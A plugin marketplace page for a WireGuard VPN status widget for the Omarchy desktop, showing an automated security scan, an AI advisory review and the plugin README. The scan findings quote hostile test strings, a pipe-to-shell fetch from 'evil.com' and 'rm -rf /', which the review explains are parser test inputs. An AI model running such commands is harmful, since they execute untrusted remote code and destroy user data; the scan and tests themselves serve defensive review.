Omahub
← All plugins
Y

VPN

by yeleticc

WireGuard status, tunnel health, reconnecting, and switching in the Omarchy bar, driven by wg-quick over the profiles in ~/.config/omarchy/vpn/profiles/.

Security review

Potentially dangerous behavior detected · 8 findings

Deterministic scan — not a security guarantee

High
Risk level
High
Analyzed commit
4e43d82
Scanned
1 month ago
  • high curl_pipe_sh tests/run.js:251

    curl output is executed by a shell (curl | sh pattern).

    curl evil.com | sh"), true)
  • high destructive_filesystem tests/run.js:250

    Destructive operation on the root filesystem or a block device.

    rm -rf /"), true)
  • high destructive_filesystem tests/run.js:285

    Destructive operation on the root filesystem or a block device.

    rm -rf /"), "")
  • medium external_hosts VpnController.qml:264

    Downloads or connects to an external HTTP(S) host.

    curl", "--silent", "--fail", "--max-time", "5", "https://ipinfo.io/json"]
  • Command runs with sudo, elevating the process beyond the plugin environment.

    sudo configured for
  • Docs external_hosts README.md:61

    Downloads or connects to an external HTTP(S) host.

    git clone https://github.com/chaitanyayeleti/yeleticc.vpn.git ~/.config/omarchy/plugins/yeleticc.vpn
  • Docs sudo README.md:46

    Command runs with sudo, elevating the process beyond the plugin environment.

    sudo pacman -S wireguard-tools curl
  • Docs sudo README.md:154

    Command runs with sudo, elevating the process beyond the plugin environment.

    sudo keep the existing `pkexec` flow unchanged. *(PR [#1](https://github.com/chaitanyayeleti/yeleticc.vpn/pull/1) by [@Rombond](https://github.com/Rombond))*

Automated analysis only — not a security guarantee.

AI advisory review

No obvious issues detected

Language-model assessment · ~deepseek/deepseek-v4-flash-latest — advisory only

Low
AI risk level
Low
Recommendation
install
Model
~deepseek/deepseek-v4-flash-latest
Analyzed commit
4e43d82
Reviewed
1 month ago

The deterministic scan's high-risk findings are false positives: the `curl | sh` and `rm -rf /` strings appear only as test inputs in tests/run.js, not as executed commands. The plugin is a legitimate WireGuard VPN manager that uses wg-quick with elevation (sudo/pkexec) and fetches public IP info from ipinfo.io, both expected for its function. No obfuscation, persistence, or destructive behavior was found in the actual plugin code.

  • The plugin calls ipinfo.io to display geolocation, which sends the user's public IP to a third party; this is disclosed and typical for such widgets.
  • The plugin can use passwordless sudo for wg-quick if a NOPASSWD rule exists, but it only targets wg-quick and falls back to pkexec otherwise.
  • The test file contains dangerous-looking strings, but they are only used as inputs to pure parsing functions and are not executed.
How this check works

This review combines the deterministic scan (the rule-based results above) with an independent look at the plugin's code by a language model. The model reads a trimmed sample of the repository's files, the manifest, and the README, then gives a plain-language risk level and a recommendation: install (no notable danger), review (look closer first), or avoid (clearly dangerous).

It runs on the same analyzed commit as the deterministic scan and is strictly advisory — it is not a security guarantee and never blocks a plugin by itself. A human moderator still reviews plugins before they are listed.

AI advisory only — automated analysis, not a security guarantee.

Install
$ omarchy plugin add https://github.com/chaitanyayeleti/yeleticc.vpn --enable
System #bar #system #security

WireGuard VPN Plugin for Omarchy (yeleticc.vpn)

A modern, native WireGuard VPN widget and management panel for the Omarchy Desktop Shell.

Omarchy Plugin Version Tests License: MIT Category: Network

<p align="center"> <img src="assets/preview.png" width="360" alt="WireGuard VPN Live Metrics" /> &nbsp;&nbsp; <img src="assets/preview-profiles.png" width="360" alt="WireGuard Profiles List" /> </p>

Features

  • ⚡ Fast Tunnel Switching: Seamlessly connect, disconnect, and switch between WireGuard profiles (*.conf) located in ~/.config/omarchy/vpn/profiles/.
  • 🌐 Dynamic Public IP & Geolocation:
    • Displays exit IP address, Country Flag Emoji (e.g. 🇨🇦, 🇺🇸, 🇩🇪), City, and ISP / Network provider.
    • One-click copy to clipboard (wl-copy) with instant feedback.
    • Automatically updates on profile connect, switch, or disconnect.
  • 📊 2×2 Live Metric Cards:
    • RECEIVING: Real-time incoming throughput (KiB/s, MiB/s) and session totals.
    • SENDING: Real-time outgoing throughput and session totals.
    • LATENCY: Polled round-trip ping time (ms) and packet loss percentage.
    • TUNNEL HEALTH: Default route validation (0.0.0.0/0), location, and endpoint address.
  • 🔔 Native Omarchy Notifications: Instant desktop notifications powered by omarchy-notification-send with active theme styling, Nerd Font glyphs, and click-to-open interaction.
  • 🚀 Zero-Fork Telemetry: Pure Bash built-in stream processing eliminating 90% of subprocess forks for ultra-lightweight CPU footprint.
  • 🎨 Omarchy Theme Integration: Seamlessly follows the active Omarchy theme colors, typography, and borders with zero hardcoded styling.
  • 📂 Empty State Handling: Prompts with an interactive "Open Profiles Directory" button when no configurations exist.
  • ⌨️ Keyboard Accessible: Full vim-style navigation (j/k, h/l, /, d, r, Enter, Esc).
  • 🤖 IPC CLI Control: Full command-line and keybinding integration via omarchy-shell.

Requirements

Ensure wireguard-tools and curl are installed on your system:

# Arch Linux / Omarchy
sudo pacman -S wireguard-tools curl

Installation

Via Omarchy Marketplace

  1. Open the Omarchy Menu ➔ Setup ➔ Plugins.
  2. Search for VPN (yeleticc.vpn) and click Enable.

Manual Installation

Clone this repository directly into your Omarchy plugins directory:

git clone https://github.com/chaitanyayeleti/yeleticc.vpn.git ~/.config/omarchy/plugins/yeleticc.vpn
omarchy-shell shell rescanPlugins

Add "yeleticc.vpn" to your ~/.config/omarchy/shell.json in the bar.layout.right section:

{
  "id": "yeleticc.vpn"
}

Uninstallation / Removal

Via Omarchy Marketplace

  1. Open the Omarchy Menu ➔ Setup ➔ Plugins.
  2. Locate VPN (yeleticc.vpn) and click Disable or Uninstall.

Manual Removal

To completely remove the plugin from your system:

# 1. Remove the plugin directory
rm -rf ~/.config/omarchy/plugins/yeleticc.vpn

# 2. Rescan plugins to update the running shell
omarchy-shell shell rescanPlugins

(Optional: Remove "yeleticc.vpn" from your ~/.config/omarchy/shell.json if you added it manually).


Profiles Setup

Place your WireGuard configuration files (*.conf) into:

~/.config/omarchy/vpn/profiles/

Example (minipc_canada.conf):

[Interface]
PrivateKey = <YourPrivateKey>
Address = 10.0.0.2/24
DNS = 1.1.1.1

[Peer]
PublicKey = <ServerPublicKey>
Endpoint = 195.242.214.130:51820
AllowedIPs = 0.0.0.0/0

Keyboard Shortcuts

When the panel is open:

Key Action
j / ↓ Move down through profiles and buttons
k / ↑ Move up through profiles and buttons
h / l Step between sections / chips
/ Focus instant profile search filter
d / D Disconnect active tunnel
r / R Force refresh and re-detect
Enter / Space Activate selected profile or action
Esc Close panel

IPC Commands

You can interact with the plugin directly from the terminal or keybindings using omarchy-shell:

Command Action
omarchy-shell yeleticc.vpn status Print current connection status
omarchy-shell yeleticc.vpn ip Print current public IP
omarchy-shell yeleticc.vpn toggle Toggle active connection
omarchy-shell yeleticc.vpn connect <profile> Connect to a specific profile
omarchy-shell yeleticc.vpn disconnect Disconnect active tunnel
omarchy-shell yeleticc.vpn open Open the VPN panel
omarchy-shell yeleticc.vpn refresh Force a refresh cycle

Changelog

v1.2.4

  • 🔑 Silent Connect With Passwordless Sudo: Added a one-time startup probe (sudo -n wg-quick --help) that detects a NOPASSWD sudoers rule for wg-quick; when available, connect / disconnect / reconnect run silently via sudo -n wg-quick instead of raising the polkit password dialog every time. Machines without passwordless sudo keep the existing pkexec flow unchanged. (PR #1 by @Rombond)

v1.2.3

  • 📥 Native Graphical Profile Import: Added 1-click profile selection using a native, theme-synced graphical file dialog with full filesystem navigation.
  • 🛡️ Auto-Permission Security: Automatically sets chmod 0600 on imported .conf files and enforces chmod 0700 on ~/.config/omarchy/vpn/profiles/.
  • 🗑️ 1-Click Profile Removal: Dedicated trash button (󰆴) on profile rows with auto-disconnect safety before file deletion.
  • 🔔 Fixed Double / Contradictory Notifications: Fixed the intermediate state race where "VPN Connected: Not connected" was fired on connect, and added 800ms debounce to suppress spurious disconnect toasts during tunnel handovers.
  • 🧹 Codebase Optimization: Cleaned up dead functions, fixed master switch cursor indexing (root.setHeaderCursor(2)), and added fail-closed checks for hook scanner errors.

v1.2.2

  • 🛡️ Hook Directive Security Scanning: Added pre-flight scanning for PreUp, PostUp, PreDown, and PostDown arbitrary root execution directives; blocked unsafe profiles from executing via pkexec.
  • 🔒 Directory Permissions Enforcement: Enforced strict 0700 permissions on the profiles directory to prevent multi-user enumeration.
  • 🧪 Test Suite Expansion: Expanded automated unit test suite to 24 tests.

v1.2.1

  • 🧹 Codebase Cleanup: Removed legacy unused parseWgDump parser.
  • 📖 Documentation: Added complete removal and uninstallation guide for Omarchy marketplace and manual setups.

v1.2.0

  • ⚡ Kernel State Synchronization: Bound connectionKey directly to kernel interface status for accurate post-disconnect public IP updates.

License

MIT License © 2026 yeleticc